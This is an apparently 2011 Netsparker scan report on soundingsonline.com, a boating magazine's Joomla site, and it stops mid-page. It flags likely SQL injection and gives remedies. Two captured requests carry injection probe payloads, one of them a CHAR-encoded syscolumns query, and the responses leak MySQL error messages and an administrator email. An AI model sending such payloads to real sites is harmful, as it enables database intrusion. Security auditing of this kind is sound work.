Netsparker, Web Application Security Scanner

XSS, SQL Injection, CWE-89, CWE-79, Javascript Injection, www.soundingsonline.com

Netsparker - Scan Report Summary
TARGET URL
http://www.soundingsonline.com/
SCAN DATE
1/24/2011 8:24:41 PM
REPORT DATE
2/28/2011 10:57:03 AM
SCAN DURATION
00:24:08

Total Requests

Average Speed

req/sec.
131
identified
76
confirmed
11
critical
10
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
8 %
IMPORTANT
56 %
MEDIUM
24 %
LOW
4 %
INFORMATION
8 %
[High Possibility] SQL Injection

[High Possibility] SQL Injection

11 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /archives/'+NSFTW+'

/archives/'+NSFTW+'

http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:38:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:38:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>Unknown column 'NSFTW' in 'where clause'</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>Unknown column 'NSFTW' in 'field list'</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives/' NSFTW '" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></a></li><li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>Soundings Gear</span></a></li></ul></li></ul>
..
- /index.php

/index.php

http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(sel..

Parameters

Parameter Type Value
option GET com_content
view GET category
layout GET blog
id GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Itemid GET 111

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/index.php" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Buying a Boat? Search on Soundingsonline.com</title> <link href="/buy-a-boat/'%20%20(select%20convert(int,CHAR(95)%20CHAR(33)%20CHAR(64)%20CHAR(50)%20CHAR(100)%20CHAR(105)%20CHAR(108)%20CHAR(101)%20CHAR(109)%20CHAR(109)%20CHAR(97))%20FROM%20syscolumns)%20%20'?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/buy-a-boat/'%20%20(select%20convert(int,CHAR(95)%20CHAR(33)%20CHAR(64)%20CHAR(50)%20CHAR(100)%20CHAR(105)%20CHAR(108)%20CHAR(101)%20CHAR(109)%20CHAR(109)%20CHAR(97))%20FROM%20syscolumns)%20%20'?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_sub_services c_uncategorized m_buy_a_boat"><!--
Type of page: category<br />Section: 15, s_sub_services<br />Category: 95, c_uncategorized<br />Menu: 111, m_buy_a_boat-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a 